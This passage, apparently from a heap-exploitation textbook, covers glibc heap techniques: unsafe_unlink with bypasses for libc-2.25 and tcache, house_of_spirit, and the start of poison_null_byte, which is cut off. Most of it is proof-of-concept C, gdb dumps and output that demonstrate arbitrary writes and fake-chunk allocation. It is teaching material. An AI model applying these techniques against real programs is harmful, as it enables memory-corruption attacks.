        if (!in_smallbin_range (P->size)                      \
            && __builtin_expect (P->fd_nextsize != NULL, 0)) {              \
        if (__builtin_expect (P->fd_nextsize->bk_nextsize != P, 0)          \
        || __builtin_expect (P->bk_nextsize->fd_nextsize != P, 0))    \
          malloc_printerr (check_action,                      \
                   "corrupted double-linked list (not small)",    \
                   P, AV);                          \
            if (FD->fd_nextsize == NULL) {                      \
                if (P->fd_nextsize == P)                      \
                  FD->fd_nextsize = FD->bk_nextsize = FD;              \
                else {                                  \
                    FD->fd_nextsize = P->fd_nextsize;                  \
                    FD->bk_nextsize = P->bk_nextsize;                  \
                    P->fd_nextsize->bk_nextsize = FD;                  \
                    P->bk_nextsize->fd_nextsize = FD;                  \
                  }                                  \
              } else {                                  \
                P->fd_nextsize->bk_nextsize = P->bk_nextsize;              \
                P->bk_nextsize->fd_nextsize = P->fd_nextsize;              \
              }                                      \
          }                                      \
      }                                          \
}

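Before unlinking, the integrity of the list is checked using chunk P's own fd and bk: the bk pointer of the chunk that P->fd refers to must point back to P, and the fd pointer of the chunk that P->bk refers to must point back to P.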

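malloc_size is set to 0x80 so that small chunks are allocated, and header_size is defined as 2. Two blocks are requested; the global pointer chunk0_ptr points to chunk0 and the local pointer chunk1_ptr points to chunk1: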

gef➤  p &chunk0_ptr
$1 = (uint64_t **) 0x601070 <chunk0_ptr>
gef➤  x/gx &chunk0_ptr
0x601070 <chunk0_ptr>:  0x0000000000602010
gef➤  p &chunk1_ptr
$2 = (uint64_t **) 0x7fffffffdc60
gef➤  x/gx &chunk1_ptr
0x7fffffffdc60: 0x00000000006020a0
gef➤  x/40gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000091  <-- chunk 0
0x602010:   0x0000000000000000  0x0000000000000000
0x602020:   0x0000000000000000  0x0000000000000000
0x602030:   0x0000000000000000  0x0000000000000000
0x602040:   0x0000000000000000  0x0000000000000000
0x602050:   0x0000000000000000  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000000000
0x602070:   0x0000000000000000  0x0000000000000000
0x602080:   0x0000000000000000  0x0000000000000000
0x602090:   0x0000000000000000  0x0000000000000091  <-- chunk 1
0x6020a0:   0x0000000000000000  0x0000000000000000
0x6020b0:   0x0000000000000000  0x0000000000000000
0x6020c0:   0x0000000000000000  0x0000000000000000
0x6020d0:   0x0000000000000000  0x0000000000000000
0x6020e0:   0x0000000000000000  0x0000000000000000
0x6020f0:   0x0000000000000000  0x0000000000000000
0x602100:   0x0000000000000000  0x0000000000000000
0x602110:   0x0000000000000000  0x0000000000000000
0x602120:   0x0000000000000000  0x0000000000020ee1  <-- top chunk
0x602130:   0x0000000000000000  0x0000000000000000

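Next, the check (P->fd->bk != P || P->bk->fd != P) == False has to be bypassed. The check has a weakness: the fd and bk fields are located purely by their fixed offsets from the chunk header. We can therefore use the global pointer chunk0_ptr to build a fake chunk that gets past it: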

gef➤  x/40gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000091  <-- chunk 0
0x602010:   0x0000000000000000  0x0000000000000000  <-- fake chunk P
0x602020:   0x0000000000601058  0x0000000000601060      <-- fd, bk pointer
0x602030:   0x0000000000000000  0x0000000000000000
0x602040:   0x0000000000000000  0x0000000000000000
0x602050:   0x0000000000000000  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000000000
0x602070:   0x0000000000000000  0x0000000000000000
0x602080:   0x0000000000000000  0x0000000000000000
0x602090:   0x0000000000000080  0x0000000000000090  <-- chunk 1 <-- prev_size
0x6020a0:   0x0000000000000000  0x0000000000000000
0x6020b0:   0x0000000000000000  0x0000000000000000
0x6020c0:   0x0000000000000000  0x0000000000000000
0x6020d0:   0x0000000000000000  0x0000000000000000
0x6020e0:   0x0000000000000000  0x0000000000000000
0x6020f0:   0x0000000000000000  0x0000000000000000
0x602100:   0x0000000000000000  0x0000000000000000
0x602110:   0x0000000000000000  0x0000000000000000
0x602120:   0x0000000000000000  0x0000000000020ee1  <-- top chunk
0x602130:   0x0000000000000000  0x0000000000000000
gef➤  x/5gx 0x601058
0x601058:   0x0000000000000000  0x00007ffff7dd2540  <-- fake chunk FD
0x601068:   0x0000000000000000  0x0000000000602010      <-- bk pointer
0x601078:   0x0000000000000000
gef➤  x/5gx 0x601060
0x601060:   0x00007ffff7dd2540  0x0000000000000000  <-- fake chunk BK
0x601070:   0x0000000000602010  0x0000000000000000      <-- fd pointer
0x601080:   0x0000000000000000

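As shown, we build a fake chunk, denoted P, inside chunk 0. Its fd and bk pointers form two chains, P->fd->bk == P and P->bk->fd == P, which pass the check. In addition, using the overflow in chunk 0, we set chunk 1's prev_size to the size of the fake chunk and clear its PREV_INUSE bit, so that the fake chunk looks like a free chunk.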

Next we free chunk 1, which triggers unlink on the fake chunk and overwrites the value of chunk0_ptr. The unlink operation works like this:

FD = P->fd;
BK = P->bk;
FD->bk = BK;
BK->fd = FD;

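Given the positions of the fd and bk pointers within the malloc_chunk structure (offsets 16 and 24 on 64-bit), this code is equivalent to:

FD = P->fd = &P - 24
BK = P->bk = &P - 16
FD->bk = *(&P - 24 + 24) = P
BK->fd = *(&P - 16 + 16) = P

This passes the unlink check, and the net effect is:

FD->bk = P = BK = &P - 16
BK->fd = P = FD = &P - 24

The pointer P, which used to point to the fake chunk on the heap, now points 24 bytes below its own address. If the program lets us write through P, we can overwrite the pointer P itself and thereby obtain an arbitrary memory write. If it lets us read through P, we get an information leak.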
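The pointer arithmetic above can be replayed without touching a real heap. The following is a minimal sketch in C, assuming a 64-bit layout in which fd and bk sit two and three machine words into the chunk. The names model_unlink, unlink_demo_gap_words, data and fake are hypothetical and used for illustration only; none of them appear in glibc.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Word offsets inside a 64-bit malloc_chunk: prev_size, size, fd, bk. */
enum { FD_WORD = 2, BK_WORD = 3 };

/* Model of the classic unlink step on memory viewed as machine words.
 * Returns 1 if the FD->bk == P && BK->fd == P check passed. */
int model_unlink(uintptr_t *P)
{
    uintptr_t *FD = (uintptr_t *)P[FD_WORD];
    uintptr_t *BK = (uintptr_t *)P[BK_WORD];

    if ((uintptr_t *)FD[BK_WORD] != P || (uintptr_t *)BK[FD_WORD] != P)
        return 0;                        /* the list check rejects the chunk */
    FD[BK_WORD] = (uintptr_t)BK;         /* FD->bk = BK */
    BK[FD_WORD] = (uintptr_t)FD;         /* BK->fd = FD */
    return 1;
}

/* Builds the fake chunk and returns how many words below its own slot the
 * modelled global pointer ends up pointing, or -1 if the check failed. */
long unlink_demo_gap_words(void)
{
    uintptr_t data[8] = {0};             /* stands in for the data segment */
    uintptr_t fake[4] = {0};             /* fake chunk P */
    uintptr_t *slot = &data[3];          /* stands in for &chunk0_ptr */

    *slot = (uintptr_t)fake;             /* chunk0_ptr points at the fake chunk */
    fake[FD_WORD] = (uintptr_t)(slot - 3);   /* fd = &P - 3 words */
    fake[BK_WORD] = (uintptr_t)(slot - 2);   /* bk = &P - 2 words */

    if (!model_unlink(fake))
        return -1;
    return (long)(slot - (uintptr_t *)*slot);
}
```

In this model unlink_demo_gap_words() evaluates to 3: the slot ends up pointing three words (24 bytes on 64-bit) below itself, which corresponds to P = &P - 24 in the walkthrough.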

In this example, since P->fd->bk and P->bk->fd both refer to P, the final result is:

chunk0_ptr = P = P->fd

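chunk0_ptr has been modified, and chunk0_ptr and chunk0_ptr[3] are now in fact the same object. The reason is that the chunk0_ptr pointer itself lives in the data segment at address 0x601070 and now points to 0x601058, while chunk0_ptr[3] means the third 8-byte unit counting from where chunk0_ptr points, so 0x601058 + 0x08*3 = 0x601070: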

gef➤  x/40gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000091  <-- chunk 0
0x602010:   0x0000000000000000  0x0000000000020ff1  <-- fake chunk P
0x602020:   0x0000000000601058  0x0000000000601060      <-- fd, bk pointer
0x602030:   0x0000000000000000  0x0000000000000000
0x602040:   0x0000000000000000  0x0000000000000000
0x602050:   0x0000000000000000  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000000000
0x602070:   0x0000000000000000  0x0000000000000000
0x602080:   0x0000000000000000  0x0000000000000000
0x602090:   0x0000000000000080  0x0000000000000090  <-- chunk 1 [be freed]
0x6020a0:   0x0000000000000000  0x0000000000000000
0x6020b0:   0x0000000000000000  0x0000000000000000
0x6020c0:   0x0000000000000000  0x0000000000000000
0x6020d0:   0x0000000000000000  0x0000000000000000
0x6020e0:   0x0000000000000000  0x0000000000000000
0x6020f0:   0x0000000000000000  0x0000000000000000
0x602100:   0x0000000000000000  0x0000000000000000
0x602110:   0x0000000000000000  0x0000000000000000
0x602120:   0x0000000000000000  0x0000000000020ee1  <-- top chunk
0x602130:   0x0000000000000000  0x0000000000000000
gef➤  x/5gx 0x601058
0x601058:   0x0000000000000000  0x00007ffff7dd2540  <-- fake chunk FD
0x601068:   0x0000000000000000  0x0000000000601058      <-- bk pointer
0x601078:   0x0000000000000000
gef➤  x/5gx 0x601060
0x601060:   0x00007ffff7dd2540  0x0000000000000000  <-- fake chunk BK
0x601070:   0x0000000000601058  0x0000000000000000      <-- fd pointer
0x601080:   0x0000000000000000
gef➤  x/gx chunk0_ptr
0x601058:   0x0000000000000000
gef➤  x/gx chunk0_ptr[3]
0x601058:   0x0000000000000000

So modifying chunk0_ptr[3] is the same as modifying chunk0_ptr:

gef➤  x/5gx 0x601058
0x601058:   0x0000000000000000  0x00007ffff7dd2540
0x601068:   0x0000000000000000  0x00007fffffffdc70  <-- chunk0_ptr[3]
0x601078:   0x0000000000000000
gef➤  x/gx chunk0_ptr
0x7fffffffdc70: 0x4141414141414141

Now chunk0_ptr points to victim_string, and we modify it:

gef➤  x/gx chunk0_ptr
0x7fffffffdc70: 0x4242424242424242

We have achieved a write to an arbitrary address.

Finally, something newer: libc-2.25 added a check for chunk_size == next->prev->chunk_size at the start of unlink, to counter single-byte overflows. The patch is as follows:

$ git show 17f487b7afa7cd6c316040f3e6c86dc96b2eec30 malloc/malloc.c
commit 17f487b7afa7cd6c316040f3e6c86dc96b2eec30
Author: DJ Delorie <dj@delorie.com>
Date:   Fri Mar 17 15:31:38 2017 -0400

    Further harden glibc malloc metadata against 1-byte overflows.

    Additional check for chunk_size == next->prev->chunk_size in unlink()

    2017-03-17  Chris Evans  <scarybeasts@gmail.com>

            * malloc/malloc.c (unlink): Add consistency check between size and
            next->prev->size, to further harden against 1-byte overflows.

diff --git a/malloc/malloc.c b/malloc/malloc.c
index e29105c372..994a23248e 100644
--- a/malloc/malloc.c
+++ b/malloc/malloc.c
@@ -1376,6 +1376,8 @@ typedef struct malloc_chunk *mbinptr;

 /* Take a chunk off a bin list */
 #define unlink(AV, P, BK, FD) {                                            \
+    if (__builtin_expect (chunksize(P) != prev_size (next_chunk(P)), 0))      \
+      malloc_printerr (check_action, "corrupted size vs. prev_size", P, AV);  \
     FD = P->fd;                                                                      \
     BK = P->bk;                                                                      \
     if (__builtin_expect (FD->bk != P || BK->fd != P, 0))                    \

The macros involved are defined as follows:

/* Ptr to next physical malloc_chunk. */
#define next_chunk(p) ((mchunkptr) (((char *) (p)) + chunksize (p)))
/* Get size, ignoring use bits */
#define chunksize(p) (chunksize_nomask (p) & ~(SIZE_BITS))
/* Like chunksize, but do not mask SIZE_BITS.  */
#define chunksize_nomask(p)         ((p)->mchunk_size)
/* Size of the chunk below P.  Only valid if prev_inuse (P).  */
#define prev_size(p) ((p)->mchunk_prev_size)
/* Bits to mask off when extracting size  */
#define SIZE_BITS (PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)

Recall the forged heap:

gef➤  x/40gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000091  <-- chunk 0
0x602010:   0x0000000000000000  0x0000000000000000  <-- fake chunk P
0x602020:   0x0000000000601058  0x0000000000601060      <-- fd, bk pointer
0x602030:   0x0000000000000000  0x0000000000000000
0x602040:   0x0000000000000000  0x0000000000000000
0x602050:   0x0000000000000000  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000000000
0x602070:   0x0000000000000000  0x0000000000000000
0x602080:   0x0000000000000000  0x0000000000000000
0x602090:   0x0000000000000080  0x0000000000000090  <-- chunk 1 <-- prev_size
0x6020a0:   0x0000000000000000  0x0000000000000000
0x6020b0:   0x0000000000000000  0x0000000000000000
0x6020c0:   0x0000000000000000  0x0000000000000000
0x6020d0:   0x0000000000000000  0x0000000000000000
0x6020e0:   0x0000000000000000  0x0000000000000000
0x6020f0:   0x0000000000000000  0x0000000000000000
0x602100:   0x0000000000000000  0x0000000000000000
0x602110:   0x0000000000000000  0x0000000000000000
0x602120:   0x0000000000000000  0x0000000000020ee1  <-- top chunk
0x602130:   0x0000000000000000  0x0000000000000000

There are three ways to pass this check:

1. Do nothing.
   - chunksize(P) == chunk0_ptr[1] & (~ 0x7) == 0x0
   - prev_size (next_chunk(P)) == prev_size (chunk0_ptr + 0x0) == 0x0
2. Set chunk0_ptr[1] = 0x8.
   - chunksize(P) == chunk0_ptr[1] & (~ 0x7) == 0x8
   - prev_size (next_chunk(P)) == prev_size (chunk0_ptr + 0x8) == 0x8
3. Set chunk0_ptr[1] = 0x80.
   - chunksize(P) == chunk0_ptr[1] & (~ 0x7) == 0x80
   - prev_size (next_chunk(P)) == prev_size (chunk0_ptr + 0x80) == 0x80
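To see why exactly these fake sizes work, the check can be modelled on a plain array of 8-byte words that starts at the fake chunk P. This is only a sketch under the assumption of a 64-bit layout; size_check_passes and option_passes are hypothetical helper names, and the array stands in for the forged heap shown in the dump above.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define SIZE_BITS 0x7u   /* PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA */

/* heap[] models memory starting at fake chunk P, one 8-byte word per entry:
 * heap[0] is P's prev_size and heap[1] is P's size field. */
int size_check_passes(const uint64_t *heap, size_t nwords)
{
    uint64_t size = heap[1] & ~(uint64_t)SIZE_BITS;   /* chunksize(P) */
    size_t next = (size_t)(size / 8);                 /* word index of next_chunk(P) */

    if (next >= nwords)
        return 0;                                     /* outside the model */
    return heap[next] == size;                        /* prev_size(next_chunk(P)) */
}

/* Lays out the forged heap with a chosen fake size and runs the check. */
int option_passes(uint64_t fake_size)
{
    uint64_t heap[18] = {0};

    heap[1]  = fake_size;   /* chunk0_ptr[1] */
    heap[16] = 0x80;        /* chunk 1 prev_size, set through the overflow */
    heap[17] = 0x90;        /* chunk 1 size with PREV_INUSE cleared */
    return size_check_passes(heap, 18);
}
```

With this model, option_passes accepts 0x0, 0x8 and 0x80 and rejects a value such as 0x20, because the word found 0x20 bytes after P is still zero.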

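The exploit now works under libc-2.25 as well. Going one step further, how do we exploit libc-2.26? First we need to know what it changed. One notable addition is tcache, a per-thread caching mechanism: by default each thread has 64 bins of increasing size, each bin is a singly linked list, and each holds at most 7 chunks. Chunks cached there are not consolidated, so when chunk 1 is freed chunk0_ptr still points to the original heap address instead of becoming chunk0_ptr = P = P->fd as before. One possible workaround is to fill the tcache bin of the relevant size first, like this: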

    // deal with tcache
    int *a[10];
    int i;
    for (i = 0; i < 7; i++) {
        a[i] = malloc(0x80);
    }
    for (i = 0; i < 7; i++) {
        free(a[i]);
    }
gef➤  p &chunk0_ptr
$2 = (uint64_t **) 0x555555755070 <chunk0_ptr>
gef➤  x/gx 0x555555755070
0x555555755070 <chunk0_ptr>:    0x00007fffffffdd0f
gef➤  x/gx 0x00007fffffffdd0f
0x7fffffffdd0f: 0x4242424242424242

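The exploit now also works under libc-2.26. tcache is an interesting mechanism, and we cover it in detail in a dedicated chapter.

Recompiling with the memory-checking flag reveals a heap-buffer-overflow: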

$ gcc -fsanitize=address -g unsafe_unlink.c
$ ./a.out
The global chunk0_ptr is at 0x602230, pointing to 0x60c00000bf80
The victim chunk we are going to corrupt is at 0x60c00000bec0

Fake chunk fd: 0x602218
Fake chunk bk: 0x602220

=================================================================
==5591==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60c00000beb0 at pc 0x000000400d74 bp 0x7ffd06423730 sp 0x7ffd06423720
WRITE of size 8 at 0x60c00000beb0 thread T0
    #0 0x400d73 in main /home/firmy/how2heap/unsafe_unlink.c:26
    #1 0x7fc925d8282f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #2 0x400968 in _start (/home/firmy/how2heap/a.out+0x400968)

0x60c00000beb0 is located 16 bytes to the left of 128-byte region [0x60c00000bec0,0x60c00000bf40)
allocated by thread T0 here:
    #0 0x7fc9261c4602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
    #1 0x400b12 in main /home/firmy/how2heap/unsafe_unlink.c:13
    #2 0x7fc925d8282f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)

house_of_spirit

#include <stdio.h>
#include <stdlib.h>

int main() {
    malloc(1);

    fprintf(stderr, "We will overwrite a pointer to point to a fake 'fastbin' region. This region contains two chunks.\n");
    unsigned long long *a, *b;
    unsigned long long fake_chunks[10] __attribute__ ((aligned (16)));

    fprintf(stderr, "The first one:  %p\n", &fake_chunks[0]);
    fprintf(stderr, "The second one: %p\n", &fake_chunks[4]);

    fake_chunks[1] = 0x20;      // the size
    fake_chunks[5] = 0x1234;    // nextsize

    fake_chunks[2] = 0x4141414141414141LL;
    fake_chunks[6] = 0x4141414141414141LL;

    fprintf(stderr, "Overwritting our pointer with the address of the fake region inside the fake first chunk, %p.\n", &fake_chunks[0]);
    a = &fake_chunks[2];

    fprintf(stderr, "Freeing the overwritten pointer.\n");
    free(a);

    fprintf(stderr, "Now the next malloc will return the region of our fake chunk at %p, which will be %p!\n", &fake_chunks[0], &fake_chunks[2]);
    b = malloc(0x10);
    fprintf(stderr, "malloc(0x10): %p\n", b);
    b[0] = 0x4242424242424242LL;
}
$ gcc -g house_of_spirit.c
$ ./a.out
We will overwrite a pointer to point to a fake 'fastbin' region. This region contains two chunks.
The first one:  0x7ffc782dae00
The second one: 0x7ffc782dae20
Overwritting our pointer with the address of the fake region inside the fake first chunk, 0x7ffc782dae00.
Freeing the overwritten pointer.
Now the next malloc will return the region of our fake chunk at 0x7ffc782dae00, which will be 0x7ffc782dae10!
malloc(0x10): 0x7ffc782dae10

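house-of-spirit is a fastbin attack: by forging a fake chunk and freeing it, the next malloc of the matching size returns the address of the fake chunk, that is, any region we control. It uses the heap's fast bin mechanism to assist a stack overflow. An ordinary stack overflow exploit aims to overwrite the function's return address and hijack control flow through EIP (RIP on x86-64). If the overflow is too short to reach the return address but can overwrite a heap pointer on the stack that is about to be freed, we can redirect that pointer to a stack address and forge fast bin chunk metadata at the corresponding position. When free is called, this chunk on the stack is placed in a fast bin. On the next malloc of the matching size, because fast bins are last-in, first-out, the stack chunk is returned to the user, and a subsequent write to it may overwrite the return address.

So the first step of the exploit is not to control a chunk but to control the pointer passed to free and point it at a fake chunk. Forging the fake chunk is therefore the key.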

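First, malloc(1) initializes the heap, and then two chunks are forged in the fake_chunks region. As noted above, we also need a modifiable pointer that is passed to free, whether it is modified through a stack overflow or by some other means: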

gef➤  x/10gx &fake_chunks
0x7fffffffdcb0: 0x0000000000000000  0x0000000000000020  <-- fake chunk 1
0x7fffffffdcc0: 0x4141414141414141  0x0000000000000000
0x7fffffffdcd0: 0x0000000000000001  0x0000000000001234  <-- fake chunk 2
0x7fffffffdce0: 0x4141414141414141  0x0000000000000000
gef➤  x/gx &a
0x7fffffffdca0: 0x0000000000000000

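Forging the chunk requires passing several checks. First, the flag bits: PREV_INUSE does not affect free here, but IS_MMAPPED and NON_MAIN_ARENA must both be zero. Second, on 64-bit systems the size of a fast chunk must be between 32 and 128 bytes. Finally, the size of the next chunk must be greater than 2*SIZE_SZ (greater than 16) and less than av->system_mem (less than 128 KB) to pass the next-chunk size check.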
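The conditions listed above can be collected into a single predicate. This is a rough sketch rather than glibc code: it assumes a 64-bit target with the default fastbin limit of 0x80, fake_fast_chunk_ok is a hypothetical name, and the system_mem value is passed in by the caller because it depends on the state of the arena.

```c
#include <assert.h>
#include <stdint.h>

#define PREV_INUSE      0x1u
#define IS_MMAPPED      0x2u
#define NON_MAIN_ARENA  0x4u
#define SIZE_BITS       (PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)
#define SIZE_SZ         8u       /* assumption: 64-bit target */
#define MIN_CHUNK       0x20u    /* smallest chunk on 64-bit */
#define MAX_FAST        0x80u    /* assumption: default fastbin limit on 64-bit */

/* Returns 1 when a forged (size, next size) pair would get past the
 * fastbin-related checks described above, 0 otherwise. */
int fake_fast_chunk_ok(uint64_t size_field, uint64_t next_size_field,
                       uint64_t system_mem)
{
    uint64_t size = size_field & ~(uint64_t)SIZE_BITS;
    uint64_t next = next_size_field & ~(uint64_t)SIZE_BITS;

    if (size_field & (IS_MMAPPED | NON_MAIN_ARENA))
        return 0;                     /* would take the mmap or other-arena path */
    if (size < MIN_CHUNK || size > MAX_FAST)
        return 0;                     /* not a fast chunk */
    if (next_size_field <= 2 * SIZE_SZ)
        return 0;                     /* next size too small */
    if (next >= system_mem)
        return 0;                     /* next size too large */
    return 1;
}
```

For the values used in house_of_spirit.c (size 0x20, next size 0x1234) and an assumed system_mem of 0x21000, the predicate holds. Setting the IS_MMAPPED bit (0x22) or shrinking the next size to 0x10 makes it fail.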

In libc-2.23 the code for these checks looks like this:

void
__libc_free (void *mem)
{
  mstate ar_ptr;
  mchunkptr p;                          /* chunk corresponding to mem */

  [...]
  p = mem2chunk (mem);

  if (chunk_is_mmapped (p))                       /* release mmapped memory. */
    {
      [...]
      munmap_chunk (p);
      return;
    }

  ar_ptr = arena_for_chunk (p);     // get the address of the arena the chunk belongs to
  _int_free (ar_ptr, p, 0);         // called when IS_MMAPPED is zero
}

mem is the address we control and pass to free. The following two macros convert between chunk pointers and malloc (user) pointers:

/* conversion from malloc headers to user pointers, and back */

#define chunk2mem(p)   ((void*)((char*)(p) + 2*SIZE_SZ))
#define mem2chunk(mem) ((mchunkptr)((char*)(mem) - 2*SIZE_SZ))
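As a quick check of the conversion, the same arithmetic can be done on plain integers. This sketch assumes SIZE_SZ is 8 (a 64-bit target); chunk2mem_addr and mem2chunk_addr are hypothetical names that mirror the macros but dereference nothing.

```c
#include <assert.h>
#include <stdint.h>

#define SIZE_SZ 8u   /* assumption: sizeof(size_t) on a 64-bit target */

/* Address arithmetic only; nothing is dereferenced. */
uint64_t chunk2mem_addr(uint64_t chunk) { return chunk + 2 * SIZE_SZ; }
uint64_t mem2chunk_addr(uint64_t mem)   { return mem - 2 * SIZE_SZ; }
```

With the addresses from the gdb session, a user pointer of 0x7fffffffdcc0 maps back to a chunk header at 0x7fffffffdcb0, which is &fake_chunks[0].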

When NON_MAIN_ARENA is zero, the main arena is returned:

/* find the heap and corresponding arena for a given ptr */

#define heap_for_ptr(ptr) \
  ((heap_info *) ((unsigned long) (ptr) & ~(HEAP_MAX_SIZE - 1)))
#define arena_for_chunk(ptr) \
  (chunk_non_main_arena (ptr) ? heap_for_ptr (ptr)->ar_ptr : &main_arena)

The program thus reaches the _int_free function without trouble:

static void
_int_free (mstate av, mchunkptr p, int have_lock)
{
  INTERNAL_SIZE_T size;        /* its size */
  mfastbinptr *fb;             /* associated fastbin */

  [...]
  size = chunksize (p);

  [...]
  /*
    If eligible, place chunk on a fastbin so it can be found
    and used quickly in malloc.
  */

  if ((unsigned long)(size) <= (unsigned long)(get_max_fast ())

#if TRIM_FASTBINS
      /*
    If TRIM_FASTBINS set, don't place chunks
    bordering top into fastbins
      */
      && (chunk_at_offset(p, size) != av->top)
#endif
      ) {

    if (__builtin_expect (chunk_at_offset (p, size)->size <= 2 * SIZE_SZ, 0)
    || __builtin_expect (chunksize (chunk_at_offset (p, size))
                 >= av->system_mem, 0))
      {
        [...]
        errstr = "free(): invalid next size (fast)";
        goto errout;
      }

    [...]
    set_fastchunks(av);
    unsigned int idx = fastbin_index(size);
    fb = &fastbin (av, idx);

    /* Atomically link P to its fastbin: P->FD = *FB; *FB = P;  */
    mchunkptr old = *fb, old2;
    [...]
    do
      {
    [...]
    p->fd = old2 = old;
      }
    while ((old = catomic_compare_and_exchange_val_rel (fb, p, old2)) != old2);

The following macro is used to locate the next chunk:

/* Treat space at ptr + offset as a chunk */
#define chunk_at_offset(p, s)  ((mchunkptr) (((char *) (p)) + (s)))

We then make pointer a point to (fake chunk 1 + 0x10), which is the mem mentioned above, and pass it to free. The allocator takes it for a real chunk, frees it and adds it to the fastbin.

gef➤  x/gx &a
0x7fffffffdca0: 0x00007fffffffdcc0
gef➤  x/10gx &fake_chunks
0x7fffffffdcb0: 0x0000000000000000  0x0000000000000020  <-- fake chunk 1 [be freed]
0x7fffffffdcc0: 0x0000000000000000  0x0000000000000000
0x7fffffffdcd0: 0x0000000000000001  0x0000000000001234  <-- fake chunk 2
0x7fffffffdce0: 0x4141414141414141  0x0000000000000000
0x7fffffffdcf0: 0x0000000000400820  0x00000000004005b0
gef➤  heap bins fast
[ Fastbins for arena 0x7ffff7dd1b20 ]
Fastbins[idx=0, size=0x10]  ←  Chunk(addr=0x7fffffffdcc0, size=0x20, flags=)

If we now malloc a fast chunk of the matching size, the allocator hands back this freed chunk from the fastbins.

gef➤  x/10gx &fake_chunks
0x7fffffffdcb0: 0x0000000000000000  0x0000000000000020  <-- new chunk
0x7fffffffdcc0: 0x4242424242424242  0x0000000000000000
0x7fffffffdcd0: 0x0000000000000001  0x0000000000001234  <-- fake chunk 2
0x7fffffffdce0: 0x4141414141414141  0x0000000000000000
0x7fffffffdcf0: 0x0000000000400820  0x00000000004005b0
gef➤  x/gx &b
0x7fffffffdca8: 0x00007fffffffdcc0
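The last-in, first-out behaviour that makes the freed fake chunk come straight back can be modelled with a tiny singly linked list. The sketch below is illustrative only: struct fast_chunk and the helper names are hypothetical, the atomic compare-and-exchange of the real code is left out, and fastbin_index64 assumes a 64-bit target.

```c
#include <assert.h>
#include <stddef.h>

/* Minimal stand-in for a free fast chunk: only the fd link matters here. */
struct fast_chunk {
    struct fast_chunk *fd;
};

/* Fastbin index on 64-bit: chunk size 0x20 maps to 0, 0x30 to 1, and so on. */
unsigned fastbin_index64(size_t chunk_size)
{
    return (unsigned)(chunk_size >> 4) - 2;
}

/* free(): P->fd = *fb; *fb = P (the real code does this atomically). */
void fastbin_push(struct fast_chunk **fb, struct fast_chunk *p)
{
    p->fd = *fb;
    *fb = p;
}

/* malloc(): take the head of the list, i.e. the most recently freed chunk. */
struct fast_chunk *fastbin_pop(struct fast_chunk **fb)
{
    struct fast_chunk *victim = *fb;

    if (victim != NULL)
        *fb = victim->fd;
    return victim;
}

/* Returns 1 if a forged chunk that was freed last is handed back first. */
int fake_chunk_returned_first(void)
{
    struct fast_chunk heap_chunk = {0}, stack_chunk = {0};
    struct fast_chunk *bin = NULL;

    fastbin_push(&bin, &heap_chunk);
    fastbin_push(&bin, &stack_chunk);   /* the forged chunk is freed last */
    return fastbin_pop(&bin) == &stack_chunk
        && fastbin_pop(&bin) == &heap_chunk;
}
```

A chunk of size 0x20 lands in index 0, which matches the idx=0 entry in the gef output, and the forged chunk is the first one popped.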

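So the main purpose of house-of-spirit is this: when the fake chunk we forge contains a region we cannot control, the technique turns that region into a controllable one. Above we filled the fake chunk with letters to make it easy to observe, but in practice those positions are often not controllable, and that is exactly the situation house-of-spirit was designed for.

A drawback of the technique is that it needs a stack address leak, otherwise the heap pointer that is about to be freed cannot be overwritten correctly. The forged data must also satisfy the alignment requirements.

Recompiling with the memory-checking flag shows the problem, namely an attempt to free a chunk that was not allocated by malloc: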

$ gcc -fsanitize=address -g house_of_spirit.c
$ ./a.out
We will overwrite a pointer to point to a fake 'fastbin' region. This region contains two chunks.
The first one:  0x7fffa61d6c00
The second one: 0x7fffa61d6c20
Overwritting our pointer with the address of the fake region inside the fake first chunk, 0x7fffa61d6c00.
Freeing the overwritten pointer.
=================================================================
==5282==ERROR: AddressSanitizer: attempting free on address which was not malloc()-ed: 0x7fffa61d6c10 in thread T0
    #0 0x7fc4c3a332ca in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x982ca)
    #1 0x400cab in main /home/firmyy/how2heap/house_of_spirit.c:24
    #2 0x7fc4c35f182f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #3 0x4009b8 in _start (/home/firmyy/how2heap/a.out+0x4009b8)

For exploiting house-of-spirit under libc-2.26, see section 4.14.

3.1.7 Linux Heap Exploitation (Part 2)

how2heap

poison_null_byte

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <malloc.h>

int main() {
    uint8_t *a, *b, *c, *b1, *b2, *d;

    a = (uint8_t*) malloc(0x10);
    int real_a_size = malloc_usable_size(a);
    fprintf(stderr, "We allocate 0x10 bytes for 'a': %p\n", a);
    fprintf(stderr, "'real' size of 'a': %#x\n", real_a_size);

    b = (uint8_t*) malloc(0x100);
    c = (uint8_t*) malloc(0x80);
    fprintf(stderr, "b: %p\n", b);
    fprintf(stderr, "c: %p\n", c);

    uint64_t* b_size_ptr = (uint64_t*)(b - 0x8);
    *(size_t*)(b+0xf0) = 0x100;
    fprintf(stderr, "b.size: %#lx ((0x100 + 0x10) | prev_in_use)\n\n", *b_size_ptr);

    // deal with tcache
    // int *k[10], i;
    // for (i = 0; i < 7; i++) {
    //     k[i] = malloc(0x100);
    // }
    // for (i = 0; i < 7; i++) {
    //     free(k[i]);
    // }
    free(b);
    uint64_t* c_prev_size_ptr = ((uint64_t*)c) - 2;
    fprintf(stderr, "After free(b), c.prev_size: %#lx\n", *c_prev_size_ptr);

    a[real_a_size] = 0; // <--- THIS IS THE "EXPLOITED BUG"
    fprintf(stderr, "We overflow 'a' with a single null byte into the metadata of 'b'\n");
    fprintf(stderr, "b.size: %#lx\n\n", *b_size_ptr);

